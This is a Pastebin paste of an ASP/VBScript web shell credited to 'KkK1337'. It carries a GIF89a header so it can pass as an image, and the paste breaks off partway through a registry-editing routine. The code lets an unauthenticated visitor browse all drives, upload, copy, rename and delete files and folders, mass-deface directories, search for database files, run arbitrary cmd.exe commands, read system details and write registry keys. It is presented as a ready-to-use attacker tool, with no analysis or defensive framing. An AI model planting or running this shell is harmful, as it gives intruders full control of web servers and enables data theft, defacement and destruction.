API tools faq
paste
Advertisement
kkDav1337

ASP Shell

kkDav1337
Sep 23rd, 2017
5,113
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 55.80 KB | None | 0 0
raw download clone embed print report
  1. GIF89a;
  2. <%@ LANGUAGE = VBScript.Encode%>
  3. <%//**Start Encode
  4. On Error Resume Next
  5.  
  6. Dim myFSO,showdisks
  7. Set myFSO = CreateObject ("Scripting.FileSystemObject")
  8. showdisks=FALSE
  9.  
  10. Server.ScriptTimeOut = 7200
  11. Class FileUploader
  12. Public Files
  13. Private mcolFormElem
  14. Private Sub Class_Initialize()
  15. Set Files = Server.CreateObject("Scripting.Dictionary")
  16. Set mcolFormElem = Server.CreateObject("Scripting.Dictionary")
  17. End Sub
  18. Private Sub Class_Terminate()
  19. If IsObject(Files) Then
  20. Files.RemoveAll()
  21. Set Files = Nothing
  22. End If
  23. If IsObject(mcolFormElem) Then
  24. mcolFormElem.RemoveAll()
  25. Set mcolFormElem = Nothing
  26. End If
  27. End Sub
  28. Public Property Get Form(sIndex)
  29. Form = ""
  30. If mcolFormElem.Exists(LCase(sIndex)) Then Form = mcolFormElem.Item(LCase(sIndex))
  31. End Property
  32. Public Default Sub Upload()
  33. Dim biData, sInputName
  34. Dim nPosBegin, nPosEnd, nPos, vDataBounds, nDataBoundPos
  35. Dim nPosFile, nPosBound
  36. biData = Request.BinaryRead(Request.TotalBytes)
  37. nPosBegin = 1
  38. nPosEnd = InstrB(nPosBegin, biData, CByteString(Chr(13)))
  39. If (nPosEnd-nPosBegin) <= 0 Then Exit Sub
  40. vDataBounds = MidB(biData, nPosBegin, nPosEnd-nPosBegin)
  41. nDataBoundPos = InstrB(1, biData, vDataBounds)
  42. Do Until nDataBoundPos = InstrB(biData, vDataBounds & CByteString("--"))
  43. nPos = InstrB(nDataBoundPos, biData, CByteString("Content-Disposition"))
  44. nPos = InstrB(nPos, biData, CByteString("name="))
  45. nPosBegin = nPos + 6
  46. nPosEnd = InstrB(nPosBegin, biData, CByteString(Chr(34)))
  47. sInputName = CWideString(MidB(biData, nPosBegin, nPosEnd-nPosBegin))
  48. nPosFile = InstrB(nDataBoundPos, biData, CByteString("filename="))
  49. nPosBound = InstrB(nPosEnd, biData, vDataBounds)
  50. If nPosFile <> 0 And nPosFile < nPosBound Then
  51. Dim oUploadFile, sFileName
  52. Set oUploadFile = New UploadedFile
  53. nPosBegin = nPosFile + 10
  54. nPosEnd = InstrB(nPosBegin, biData, CByteString(Chr(34)))
  55. sFileName = CWideString(MidB(biData, nPosBegin, nPosEnd-nPosBegin))
  56. oUploadFile.FileName = Right(sFileName, Len(sFileName)-InStrRev(sFileName, "\"))
  57. nPos = InstrB(nPosEnd, biData, CByteString("Content-Type:"))
  58. nPosBegin = nPos + 14
  59. nPosEnd = InstrB(nPosBegin, biData, CByteString(Chr(13)))
  60. oUploadFile.ContentType = CWideString(MidB(biData, nPosBegin, nPosEnd-nPosBegin))
  61. nPosBegin = nPosEnd+4
  62. nPosEnd = InstrB(nPosBegin, biData, vDataBounds) - 2
  63. oUploadFile.FileData = MidB(biData, nPosBegin, nPosEnd-nPosBegin)
  64. If oUploadFile.FileSize > 0 Then Files.Add LCase(sInputName), oUploadFile
  65. Else
  66. nPos = InstrB(nPos, biData, CByteString(Chr(13)))
  67. nPosBegin = nPos + 4
  68. nPosEnd = InstrB(nPosBegin, biData, vDataBounds) - 2
  69. If Not mcolFormElem.Exists(LCase(sInputName)) Then mcolFormElem.Add LCase(sInputName), CWideString(MidB(biData, nPosBegin, nPosEnd-nPosBegin))
  70. End If
  71. nDataBoundPos = InstrB(nDataBoundPos + LenB(vDataBounds), biData, vDataBounds)
  72. Loop
  73. End Sub
  74. Private Function CByteString(sString)
  75. Dim nIndex
  76. For nIndex = 1 to Len(sString)
  77. CByteString = CByteString & ChrB(AscB(Mid(sString,nIndex,1)))
  78. Next
  79. End Function
  80. Private Function CWideString(bsString)
  81. Dim nIndex
  82. CWideString =""
  83. For nIndex = 1 to LenB(bsString)
  84. CWideString = CWideString & Chr(AscB(MidB(bsString,nIndex,1)))
  85. Next
  86. End Function
  87. End Class
  88. Class UploadedFile
  89. Public ContentType
  90. Public FileName
  91. Public FileData
  92. Public Property Get FileSize()
  93. FileSize = LenB(FileData)
  94. End Property
  95. Public Sub SaveToDisk(sPath)
  96. Dim oFS, oFile
  97. Dim nIndex
  98. If sPath = "" Or FileName = "" Then Exit Sub
  99. If Mid(sPath, Len(sPath)) <> "\" Then sPath = sPath & "\"
  100. Set oFS = Server.CreateObject("Scripting.FileSystemObject")
  101. If Not oFS.FolderExists(sPath) Then Exit Sub
  102. Set oFile = oFS.CreateTextFile(sPath & FileName, True)
  103. For nIndex = 1 to LenB(FileData)
  104. oFile.Write Chr(AscB(MidB(FileData,nIndex,1)))
  105. Next
  106. oFile.Close
  107. End Sub
  108. Public Sub SaveToDatabase(ByRef oField)
  109. If LenB(FileData) = 0 Then Exit Sub
  110. If IsObject(oField) Then
  111. oField.AppendChunk FileData
  112. End If
  113. End Sub
  114. End Class
  115. startcode = "<html><head><title>pipo site</title></head><body>"
  116. endocde = "</body></html>"
  117. onlinehelp = "<font face=""arial"" size=""1"">.:: <a href=""http://umbrella-security.ml"" target=""_blank"">ONLINE HELP</a> ::.</font><br>"
  118. Function HexConv(hexVar)
  119. Dim hxx, hxx_var, multiply
  120. IF hexVar <> "" THEN
  121. hexVar = UCASE(hexVar)
  122. hexVar = StrReverse(hexVar)
  123. DIM hx()
  124. REDIM hx(LEN(hexVar))
  125. hxx = 0
  126. hxx_var = 0
  127. FOR hxx = 1 TO LEN(hexVar)
  128. IF multiply = "" THEN multiply = 1
  129. hx(hxx) = mid(hexVar,hxx,1)
  130. hxx_var = (get_hxno(hx(hxx)) * multiply) + hxx_var
  131. multiply = (multiply * 16)
  132. NEXT
  133. hexVar = hxx_var
  134. HexConv = hexVar
  135. END IF
  136. End Function
  137. cprthtml = "<font face='arial' size='1'>.:: 1.0 ::.</font>"
  138. Function get_hxno(ghx)
  139. If ghx = "A" Then
  140. ghx = 10
  141. ElseIf ghx = "B" Then
  142. ghx = 11
  143. ElseIf ghx = "C" Then
  144. ghx = 12
  145. ElseIf ghx = "D" Then
  146. ghx = 13
  147. ElseIf ghx = "E" Then
  148. ghx = 14
  149. ElseIf ghx = "F" Then
  150. ghx = 15
  151. End If
  152. get_hxno = ghx
  153. End Function
  154.  
  155. keydec="<font face='arial' size='1'>.:: Shell &copy; BY <a href='mailto:'>KkK1337</a> - <a href='' target='_blank'></a> .:kkk1337@mail.com:.</font>"
  156. Function showobj(objpath)
  157. showobj = Mid(objpath,InstrRev(objpath,"\")+1,Len(objpath))
  158. End Function
  159. Function showobjpath(objpath)
  160. showobjpath = Left(objpath,InstrRev(objpath,"\"))
  161. End Function
  162. Function checking(a,b)
  163. ' If CStr(Mid(a,95,13)) = CStr(Mid(b,95,13)) Then
  164. ' pagina = Mid(Request.ServerVariables("SCRIPT_NAME"),InstrRev(Request.ServerVariables("SCRIPT_NAME"),"/")+1,Len(Request.ServerVariables("SCRIPT_NAME"))) & "?action=error"
  165. ' Response.Redirect(pagina)
  166. ' End If
  167. End Function
  168. Sub hdr()
  169. Response.Write startcode
  170. Response.Write keydec
  171. Response.Write "<br>"
  172. End Sub
  173.  
  174. sub araBul(path_,ara_)
  175. on error resume next
  176. If Len(path_) > 0 Then
  177. cur = path_&"\"
  178. If cur = "\\" Then cur = ""
  179. parent = ""
  180. If InStrRev(cur,"\") > 0 Then
  181. parent = Left(cur, InStrRev(cur, "\", Len(cur)-1))
  182. End If
  183. Else
  184. cur = ""
  185. End If
  186.  
  187. Set f = myFSO.GetFolder(cur)
  188.  
  189. Set fc = f.Files
  190. For Each f1 In fc
  191. if lcase(InStr(1,f1.name,lcase(ara_)))>0 then
  192. downStr = "<font face=webdings size=5><a href='"& Request.ServerVariables("SCRIPT_NAME") & "?action=download&file=" & Replace(f1.path,"\","|") &"'>?/a></font>"
  193. if lcase(ara_)="mdb" then
  194. Response.Write downStr&"<font face=wingdings size=5><a href='"& Request.ServerVariables("SCRIPT_NAME") &"?action=del&path=" & Replace(f1.path,"\","|") & "'>?/a></font> * <a href='"& Request.ServerVariables("SCRIPT_NAME") &"?action=search&status=7&path="&f1.path&"'>"& f1.path &" ["&f1.size&"]"&"</a></b><br>"
  195. else
  196. Response.Write downStr&"<font face=wingdings size=5><a href='"& Request.ServerVariables("SCRIPT_NAME") &"?action=del&path=" & Replace(f1.path,"\","|") & "'>?/a><a href='"& Request.ServerVariables("SCRIPT_NAME") & "?action=txtedit&file=" & Replace(f1.path,"\","|") &"'>!</a></font> - <a href='"& Request.ServerVariables("SCRIPT_NAME") &"?action=search&status=5&path="&f1.path&"'>"& f1.path &" ["&f1.size&"]</a></b><br>"
  197. end if
  198. end if
  199. Next
  200.  
  201. Set fs = f.SubFolders
  202. For Each f1 In fs
  203. araBul f1.path,ara_
  204. Next
  205. Set f = Nothing
  206. Set fc = Nothing
  207. Set fs = Nothing
  208. end sub
  209.  
  210.  
  211. Sub showcontent()
  212. showdisks=TRUE
  213. Response.Write "<font face=""arial"" size=""1"">.:: <a href=""" & Request.ServerVariables("SCRIPT_NAME") & "?raiz=root"">DRIVES</a> ::.<br>.:: SCRIPT PATH: " & UCase(Server.MapPath(Request.ServerVariables("SCRIPT_NAME"))) & "<br><br></font>"
  214. If Trim(Request.QueryString("raiz")) = "root" Then
  215. Set fs=Server.Createobject("Scripting.FileSystemObject")
  216. Set drivecollection=fs.drives
  217. Response.Write "<font face=""arial"" size=""2"">"
  218. For Each drive IN drivecollection
  219. str=drive.driveletter & ":"
  220. Response.Write "<b><a href=""" & Request.ServerVariables("SCRIPT_NAME") & "?raiz=" & str & """>" & UCase(str) & "</a></b><br>"
  221. Select Case drive.DriveType
  222. Case 0
  223. tipodrive = "Unknown"
  224. nomedrive = drive.VolumeName
  225. Case 1
  226. tipodrive = "Removable"
  227. If drive.isready Then
  228. nomedrive = drive.VolumeName
  229. Else
  230. nomedrive = ""
  231. End If
  232. Case 2
  233. tipodrive = "Fixed"
  234. If drive.isready Then
  235. nomedrive = drive.VolumeName
  236. Else
  237. nomedrive = ""
  238. End If
  239. Case 3
  240. tipodrive = "Network"
  241. If drive.isready Then
  242. nomedrive = drive.ShareName
  243. Else
  244. nomedrive = ""
  245. End If
  246. Case 4
  247. tipodrive = "CD-Rom"
  248. If drive.isready Then
  249. nomedrive = drive.VolumeName
  250. Else
  251. nomedrive = ""
  252. End If
  253. Case 5
  254. tipodrive = "RAM Disk"
  255. If drive.isready Then
  256. nomedrive = drive.VolumeName
  257. Else
  258. nomedrive = ""
  259. End If
  260. End Select
  261. response.write "<b>Type:</b> " & tipodrive & "<br>"
  262. response.write "<b>Name: </b>" & nomedrive & "<br>"
  263. response.write "<b>File System: </b>"
  264. If drive.isready Then
  265. set sp=fs.getdrive(str)
  266. response.write sp.filesystem & "<br>"
  267. Else
  268. response.write "-<br>"
  269. End If
  270. Response.Write "<b>Disk Space: </b>"
  271. If drive.isready Then
  272. freespace = (drive.AvailableSpace / 1048576)
  273. set sp=fs.getdrive(str)
  274. response.write(Round(freespace,1) & " MB<br>")
  275. Else
  276. response.write("-<br>")
  277. End If
  278. Response.Write "<b>Total Space: </b>"
  279. If drive.isready Then
  280. totalspace = (drive.TotalSize / 1048576)
  281. set sp=fs.getdrive(str)
  282. response.write(Round(totalspace,1) & " MB<br>")
  283. Else
  284. response.write("-<br>")
  285. End If
  286. Response.Write "<br>"
  287. Next
  288. Response.Write "</font>"
  289. Set fs = Nothing
  290. Set drivecollection = Nothing
  291. set sp=Nothing
  292. Else
  293. If Trim(Request.QueryString("raiz")) = "" Then
  294. caminho = Server.MapPath(Request.ServerVariables("SCRIPT_NAME"))
  295. pos = Instr(caminho,"\")
  296. pos2 = 1
  297. While pos2 <> 0
  298. If Instr(pos + 1,caminho,"\") <> 0 Then
  299. pos = Instr(pos + 1,caminho,"\")
  300. Else
  301. pos2 = 0
  302. End If
  303. Wend
  304. raiz = Left(caminho,pos)
  305. Else
  306. raiz = trim(Request.QueryString("raiz")) & "\"
  307. End If
  308. Set ObjFSO = CreateObject("Scripting.FileSystemObject")
  309. Set MonRep = ObjFSO.GetFolder(raiz)
  310. Set ColFolders = MonRep.SubFolders
  311. Set ColFiles0 = MonRep.Files
  312. Response.Write "<font face='arial' size='1'><a href=""#"" onclick=""javascript:document.open('" & Request.ServerVariables("SCRIPT_NAME") & "?action=mass&massact=test&path=" & Replace(raiz,"\","|") & "', 'win1','width=600,height=300,scrollbars=YES,resizable')"">MASS TEST IN " & UCase(raiz) & "</a></font><br><br>"
  313. Response.Write "<font face='arial' size='1'><a href=""#"" onclick=""javascript:document.open('" & Request.ServerVariables("SCRIPT_NAME") & "?action=mass&massact=dfc&path=" & Replace(raiz,"\","|") & "', 'win1','width=700,height=300,scrollbars=YES,resizable')"">MASS DEFACE IN " & UCase(raiz) & "</a></font><br><br>"
  314. Response.Write "<font face='arial' size='1'><a href=""#"" onclick=""javascript:document.open('" & Request.ServerVariables("SCRIPT_NAME") & "?action=upload&path=" & Replace(raiz,"\","|") & "', 'win1','width=500,height=100,scrollbars=YES,resizable')"">UPLOAD FILE TO " & UCase(raiz) & "</a></font><br><br>"
  315.  
  316. Response.Write "<font face='arial' size='1'>"
  317. Response.Write "<a href=""#"" onclick=""javascript:document.open('" & Request.ServerVariables("SCRIPT_NAME") & "?action=cmd', 'win1','width=450,height=200,scrollbars=YES,resizable')"">PROMPT</a>"
  318. Response.Write " - <a href=""#"" onclick=""javascript:document.open('" & Request.ServerVariables("SCRIPT_NAME") & "?action=info', 'win1','width=760,height=450,scrollbars=YES,resizable')"">SYS INFO</a>"
  319. Response.Write " - <a href=""#"" onclick=""javascript:document.open('" & Request.ServerVariables("SCRIPT_NAME") & "?action=reg', 'win1','width=550,height=200,scrollbars=YES,resizable')"">REGEDIT</a>"
  320. Response.Write " - <a href=""#"" onclick=""javascript:document.open('" & Request.ServerVariables("SCRIPT_NAME") & "?action=search&path=" & Replace(raiz,"\","|") & "', 'win1','width=500,height=100,scrollbars=YES,resizable')"">SEARCH</a>"
  321. Response.Write " - <a href=""#"" onclick=""javascript:document.open('" & Request.ServerVariables("SCRIPT_NAME") & "?action=sqlserver', 'win1','width=550,height=150,scrollbars=YES,resizable')"">EXECUTE SQL</a>"
  322. Response.Write " - <a href=""#"" onclick=""javascript:document.open('" & Request.ServerVariables("SCRIPT_NAME") & "?action=about', 'win1','width=550,height=250,scrollbars=YES,resizable')"">ABOUT</a>"
  323. Response.Write "</font><br><br>"
  324.  
  325.  
  326. Response.Write "<font face='arial'><b>Root Folder: " & raiz & "</b></font><br><br>"
  327. If CInt(Len(raiz) - 1) <> 2 Then
  328. barrapos = CInt(InstrRev(Left(raiz,Len(raiz) - 1),"\")) - 1
  329. backlevel = Left(raiz,barrapos)
  330. Response.Write "<font face='arial' size='2'><b>&lt;DIR&gt;<a href='" & Request.ServerVariables("SCRIPT_NAME") & "?raiz=" & backlevel & "'> . . </font></b></a><br>"
  331. Else
  332. Response.Write "<font face='arial' size='2'><b>&lt;DIR&gt;<a href='" & Request.ServerVariables("SCRIPT_NAME") & "?raiz=root'> . .&nbsp;</font></b></a><br>"
  333. End If
  334. Response.Write "<table border=""0"" cellspacing=""0"" cellpadding=""0"" >"
  335. for each folderItem in ColFolders
  336. Response.Write "<tr><td><font face='arial' size='2'><b>&lt;DIR&gt; <a href='" & Request.ServerVariables("SCRIPT_NAME") & "?raiz=" & folderItem.path & "'>" & showobj(folderItem.path) & "</a></b></td><td valign='baseline'>&nbsp;&nbsp;<font face='arial' size='1'><a href=""#"" onclick=""javascript:document.open('" & Request.ServerVariables("SCRIPT_NAME") & "?action=put&path=" & Replace(folderItem.path,"\","|") & "', 'win1','width=400,height=250,scrollbars=YES,resizable')"">&lt;&lt; PUT</a></font></td>"
  337. Response.Write "<td valign='baseline'>&nbsp;&nbsp;<font face='arial' size='1'><a href=""#"" onclick=""javascript:document.open('" & Request.ServerVariables("SCRIPT_NAME") & "?action=fcopy&path=" & Replace(folderItem.path,"\","|") & "', 'win1','width=400,height=100,scrollbars=YES,resizable')"">&lt;&lt; Copy/Move</a></font></td>"
  338. Response.Write "<td valign='baseline'>&nbsp;&nbsp;<font face='arial' size='1'><a href=""#"" onclick=""javascript:document.open('" & Request.ServerVariables("SCRIPT_NAME") & "?action=fdel&path=" & Replace(folderItem.path,"\","|") & "', 'win1','width=400,height=150,scrollbars=YES,resizable')"">&lt;&lt; Delete</a></font></td></tr>"
  339. next
  340. Response.Write "</table><br><table border=""0"" cellspacing=""0"" cellpadding=""0"" >"
  341. marcatabela = true
  342. for each FilesItem0 in ColFiles0
  343. If marcatabela = true then
  344. corfundotabela = " bgcolor=""#EEEEEE"""
  345. Else
  346. corfundotabela = ""
  347. End If
  348. Response.Write "<tr><td" & corfundotabela & "><font face='arial' size='2'>:: " & showobj(FilesItem0.path) & "</td><td valign='baseline'" & corfundotabela & "><font face='arial' size='1'>&nbsp;&nbsp;" & FormatNumber(FilesItem0.size/1024, 0) & "&nbsp;Kbytes&nbsp;&nbsp;&nbsp;</font></td><td valign='baseline'" & corfundotabela & ">&nbsp;&nbsp;<font face='arial' size='1'><a href=""#"" onclick=""javascript:document.open('" & Request.ServerVariables("SCRIPT_NAME") & "?action=get&path=" & Replace(FilesItem0.path,"\","|") & "', 'win1','width=400,height=200,scrollbars=YES,resizable')"">o.GET.o</a></font></td><td valign='baseline'" & corfundotabela & ">&nbsp;&nbsp;&nbsp;&nbsp;<font face='arial' size='1'><a href=""#"" onclick=""javascript:document.open('" & Request.ServerVariables("SCRIPT_NAME") & "?action=ren&path=" & Replace(FilesItem0.path,"\","|") & "', 'win1','width=400,height=200,scrollbars=YES,resizable')"">o.REN.o</a></font></td><td valign='baseline'" & corfundotabela & ">&nbsp;&nbsp;&nbsp;&nbsp;<font face='arial' size='1'><a href=""#"" onclick=""javascript:document.open('" & Request.ServerVariables("SCRIPT_NAME") & "?action=del&path=" & Replace(FilesItem0.path,"\","|") & "', 'win1','width=400,height=200,scrollbars=YES,resizable')"">o.DEL.o</a></font></td><td valign='baseline'" & corfundotabela & ">&nbsp;&nbsp;&nbsp;&nbsp;<font face='arial' size='1'><a href=""#"" onclick=""javascript:document.open('" & Request.ServerVariables("SCRIPT_NAME") & "?action=txtview&file=" & Replace(FilesItem0.path,"\","|") & "', 'win1','width=640,height=480,scrollbars=YES,resizable')"">o.VIEW.o</a></font></td><td valign='baseline'" & corfundotabela & ">&nbsp;&nbsp;&nbsp;&nbsp;<font face='arial' size='1'><a href=""#"" onclick=""javascript:document.open('" & Request.ServerVariables("SCRIPT_NAME") & "?action=txtedit&file=" & Replace(FilesItem0.path,"\","|") & "', 'win1','width=760,height=520,scrollbars=YES,resizable')"">o.EDIT.o</a></font></td><td valign='baseline'" & corfundotabela & ">&nbsp;&nbsp;&nbsp;&nbsp;<font face='arial' size='1'><a href=""" & Request.ServerVariables("SCRIPT_NAME") & "?action=download&file=" & Replace(FilesItem0.path,"\","|") & """>o.?ndir.o</a></font></td><td valign='baseline'" & corfundotabela & ">&nbsp;&nbsp;&nbsp;&nbsp;<font face='arial' size='1'><a target='opener' href=""" & Request.ServerVariables("SCRIPT_NAME") & "?action=filecopy&file=" & Replace(FilesItem0.path,"\","|") & """>o.FileCopy.o</a></font></td></tr>"
  349. marcatabela = NOT marcatabela
  350. next
  351. Response.Write "</table>"
  352. End If
  353. End Sub
  354. Select Case Trim(Request.QueryString("action"))
  355. Case "get"
  356. checa = checking(cprthtml,keydec)
  357. Call hdr()
  358. Response.Write copyright & onlinehelp
  359. caminho = Replace(Trim(Request.QueryString("path")),"|","\")
  360. Set ObjFSO = CreateObject("Scripting.FileSystemObject")
  361. Set MyFile = ObjFSO.GetFile(caminho)
  362. destino = Left(Server.MapPath(Request.ServerVariables("SCRIPT_NAME")),InstrRev(Server.MapPath(Request.ServerVariables("SCRIPT_NAME")),"\"))
  363. MyFile.Copy (destino)
  364. If Err.Number = 0 Then
  365. Response.Write "<font face='arial' size='2'><center><br><br>File: <b>" & caminho & "</b><br>Copied to: " & destino
  366. End If
  367. Case "put"
  368. checa = checking(cprthtml,keydec)
  369. Call hdr()
  370. Response.Write copyright & onlinehelp
  371. If Trim(Request.QueryString("arquivo")) = "" Then
  372. caminho = Left(Server.MapPath(Request.ServerVariables("SCRIPT_NAME")),InstrRev(Server.MapPath(Request.ServerVariables("SCRIPT_NAME")),"\"))
  373. varpath = Trim(Request.QueryString("path"))
  374. Set ObjFSO = CreateObject("Scripting.FileSystemObject")
  375. Set MonRep = ObjFSO.GetFolder(caminho)
  376. Set ColFolders = MonRep.SubFolders
  377. Set ColFiles0 = MonRep.Files
  378.  
  379. Response.Write "<font face='arial' size='2'><b>Select File: <br><table border=""0"" cellspacing=""0"" cellpadding=""0"" >"
  380. for each FilesItem0 in ColFiles0
  381. Response.Write "<tr><td><font face='arial' size='2'>:: " & showobj(FilesItem0.path) & "</td><td valign='baseline'><font face='arial' size='1'>&nbsp;&nbsp;" & FormatNumber(FilesItem0.size/1024, 0) & "&nbsp;Kbytes&nbsp;&nbsp;&nbsp;</font></td><td valign='baseline'>&nbsp;&nbsp;<font face='arial' size='1'><a href=""" & Request.ServerVariables("SCRIPT_NAME") & "?action=put&path=" & varpath & "&arquivo=" & Replace(FilesItem0.path,"\","|") & """>:: SELECT ::</a></font></td></tr>"
  382. next
  383. Response.Write "</table>"
  384. Else
  385. destino = Replace(Trim(Request.QueryString("path")),"|","\") & "\"
  386. arquivo = Replace(Trim(Request.QueryString("arquivo")),"|","\")
  387. Set ObjFSO = CreateObject("Scripting.FileSystemObject")
  388. Set MyFile = ObjFSO.GetFile(arquivo)
  389. MyFile.Copy (destino)
  390. If Err.Number = 0 Then
  391. Response.Write "<font face='arial' size='2'><center><br><br>File: <b>" & arquivo & "</b><br>Copied to: <b>" & destino
  392. End If
  393. End If
  394. Case "del"
  395. checa = checking(cprthtml,keydec)
  396. Call hdr()
  397. Response.Write copyright & onlinehelp
  398. caminho = Replace(Trim(Request.QueryString("path")),"|","\")
  399. Set ObjFSO = CreateObject("Scripting.FileSystemObject")
  400. Set MyFile = ObjFSO.GetFile(caminho)
  401. MyFile.Delete
  402. If Err.Number = 0 Then
  403. Response.Write "<SCRIPT LANGUAGE=""JavaScript"">self.opener.document.location.reload();</SCRIPT>"
  404. Response.Write "<font face='arial' size='2'><center><br><br>Folder <b>" & caminho & "</b> Deleted.<br>"
  405. End If
  406.  
  407. Case "fdel"
  408. checa = checking(cprthtml,keydec)
  409. Call hdr()
  410. Response.Write copyright & onlinehelp
  411. caminho = Replace(Trim(Request.QueryString("path")),"|","\")
  412. Set ObjFSO = CreateObject("Scripting.FileSystemObject")
  413. ObjFSO.DeleteFolder caminho
  414. If Err.Number = 0 Then
  415. Response.Write "<SCRIPT LANGUAGE=""JavaScript"">self.opener.document.location.reload();</SCRIPT>"
  416. Response.Write "<font face='arial' size='2'><center><br><br>File <b>" & caminho & "</b> Deleted.<br>"
  417. End If
  418.  
  419. Case "ren"
  420. checa = checking(cprthtml,keydec)
  421. Call hdr()
  422. Response.Write copyright & onlinehelp
  423. If Trim(Request.QueryString("status")) <> "2" Then
  424. caminho = Replace(Trim(Request.QueryString("path")),"|","\")
  425. arquivo = showobj(caminho)
  426. Response.Write "<br><font face=""arial"" size=""2""><b>" & arquivo & "</b><br>" & _
  427. "<form action=""" & Request.ServerVariables("SCRIPT_NAME") & """ method=""get"">" & _
  428. "<input type=""hidden"" name=""action"" value=""ren"">" & _
  429. "<input type=""hidden"" name=""status"" value=""2"">" & _
  430. "<input type=""hidden"" name=""path"" value=""" & Trim(Request.QueryString("path")) & """>" & _
  431. "New Name: <input type=""text"" name=""newname"">" & _
  432. "&nbsp;&nbsp;<input type=""submit"" value=""Submit"">" & _
  433. "</form>"
  434. Else
  435. caminho = Replace(Trim(Request.QueryString("path")),"|","\")
  436. Set ObjFSO = CreateObject("Scripting.FileSystemObject")
  437. Set MyFile = ObjFSO.GetFile(caminho)
  438. destino = Left(caminho,InStrRev(caminho,"\")) & Trim(Request.QueryString("newname"))
  439. MyFile.Move (destino)
  440. If Err.Number = 0 Then
  441. Response.Write "<font face='arial' size='2'><center><br><br>Arquivo: <b>" & caminho & "</b><br>renomeado para<b>: " & destino
  442. Response.Write "<SCRIPT LANGUAGE=""JavaScript"">self.opener.document.location.reload();</SCRIPT>"
  443. End If
  444. End If
  445. Case "error"
  446. Response.Write "<center><font face='arial' size='2' color='red'> <b>C?DIGO CORROMPIDO<BR>CORRUPT CODE</font></center>"
  447. Case "cmd"
  448. checa = checking(cprthtml,keydec)
  449. Call hdr()
  450. Response.Write copyright & onlinehelp
  451. Set oScript = Server.CreateObject("WSCRIPT.SHELL")
  452. Set oScriptNet = Server.CreateObject("WSCRIPT.NETWORK")
  453. Set oFileSys = Server.CreateObject("Scripting.FileSystemObject")
  454. szCMD = Request.QueryString(".CMD")
  455. If (szCMD <> "") Then
  456. szTempFile = "c:\" & oFileSys.GetTempName( )
  457. Call oScript.Run ("cmd.exe /c " & szCMD & " > " & szTempFile, 0, True)
  458. Set oFile = oFileSys.OpenTextFile (szTempFile, 1, False, 0)
  459. End If
  460. Response.Write "<FORM action=""" & Request.ServerVariables("URL") & """ method=""GET""><input type=""hidden"" name=""action"" value=""cmd""><input type=text name="".CMD"" size=45 value=""" & szCMD & """><input type=submit value=""Run""></FORM><br><br> "
  461. If (IsObject(oFile)) Then
  462. On Error Resume Next
  463. Response.Write "<font face=""arial"">"
  464. Response.Write Replace(Replace(Server.HTMLEncode(oFile.ReadAll),VbCrLf,"<br>")," ","&nbsp;")
  465. oFile.Close
  466. Call oFileSys.DeleteFile(szTempFile, True)
  467. End If
  468. Case "info"
  469. checa = checking(cprthtml,keydec)
  470. Call hdr()
  471. Response.Write copyright & onlinehelp
  472. Set WshNetwork = Server.CreateObject("WScript.Network")
  473. Set WshShell = Server.CreateObject("WScript.Shell")
  474. Set WshEnv = WshShell.Environment("SYSTEM")
  475. Response.Write "<br><font face=arial size=2>"
  476. Response.Write "<b>User Properties:</b><br>"
  477. Response.Write "<b>UserName: </b>" & WshNetwork.UserName & "<br>"
  478. Response.Write "<b>Computer Name: </b>" & WshNetwork.ComputerName & "<br>"
  479. Response.Write "<b>User Domain: </b>" & WshNetwork.UserDomain & "<br>"
  480. Set Drives = WshNetwork.EnumNetworkDrives
  481. For i = 0 to Drives.Count - 1
  482. Response.Write "<b>Drive de Rede (Mapeado): </b>" & Drives.Item(i) & "<br>"
  483. Next
  484. Response.Write "<br><b>Cpu Information:</b><br>"
  485. Response.Write "<b>Processor Architecture: </b>" & WshEnv("PROCESSOR_ARCHITECTURE") & "<br>"
  486. Response.Write "<b>Number Of Processors: </b>" & WshEnv("NUMBER_OF_PROCESSORS") & "<br>"
  487. Response.Write "<b>Processor Identifier: </b>" & WshEnv("PROCESSOR_IDENTIFIER") & "<br>"
  488. Response.Write "<b>Processor Level: </b>" & WshEnv("PROCESSOR_LEVEL") & "<br>"
  489. Response.Write "<b>Processor Revision: </b>" & WshEnv("PROCESSOR_REVISION") & "<br>"
  490. Response.Write "<br><b>Operating System Information:</b><br>"
  491. Response.Write "<b>IP: </b>" & request.servervariables("LOCAL_ADDR") & "<br>"
  492. Response.Write "<b>Sistem OS: </b>" & WshEnv("OS") & "<br>"
  493. Response.Write "<b>Server Software: </b>" & request.servervariables("SERVER_SOFTWARE") & "<br>"
  494. Response.Write "<b>Cmd Path: </b>" & WshShell.ExpandEnvironmentStrings("%ComSpec%") & "<br>"
  495. Response.Write "<b>Public Paths: </b>" & WshEnv("PATH") & "<br>"
  496. Response.Write "<b>Executables: </b>" & WshEnv("PATHEXT") & "<br>"
  497. Response.Write "<b>Prompt: </b> " & WshEnv("PROMPT") & "<br>"
  498. Response.Write "<b>System Drive: </b>" & WshShell.ExpandEnvironmentStrings("%SYSTEMDRIVE%") & "<br>"
  499. Response.Write "<b>System Root: </b>" & WshShell.ExpandEnvironmentStrings("%SYSTEMROOT%") & "<br>"
  500. Response.Write "<b>System32 Path: </b>" & WshShell.CurrentDirectory & "<br>"
  501. Set Drives = Nothing
  502. Set WshNetwork = Nothing
  503. Set WshShell = Nothing
  504. Set WshEnv = Nothing
  505. Case "reg"
  506. checa = checking(cprthtml,keydec)
  507. Call hdr()
  508. Response.Write copyright & onlinehelp
  509. Set WshShell = Server.CreateObject("WScript.Shell")
  510. Response.Write "<font face=""arial"" size=""2""><br><b>Registry Editor:</b><br><br>"
  511. Select Case Trim(Request.QueryString("regaction"))
  512. Case "w"
  513. If Trim(Request.QueryString("process")) = "yes" Then
  514. Select Case Trim(Request.QueryString("type"))
  515. Case "1"
  516. teste = WshShell.RegWrite (Trim(Request.QueryString("key")), Trim(Request.QueryString("value")), "REG_SZ")
  517. Case "2"
  518. teste = WshShell.RegWrite (Trim(Request.QueryString("key")), CInt(Trim(Request.QueryString("value"))), "REG_DWORD")
  519. Case "3"
  520. teste = WshShell.RegWrite (Trim(Request.QueryString("key")), CInt(Trim(Request.QueryString("value"))), "REG_BINARY")
  521. Case "4"
  522. teste = WshShell.RegWrite (Trim(Request.QueryString("key")), Trim(Request.QueryString("value")), "REG_EXPAND_SZ")
  523. Case "5"
  524. teste = WshShell.RegWrite (Trim(Request.QueryString("key")), Trim(Request.QueryString("value")), "REG_MULTI_SZ")
  525. End Select
  526. Response.Write "<center><br><font face=""arial"" size=""2"">Registry <b>"
  527. Response.Write Trim(Request.QueryString("key")) & "</b> Changed.</center>"
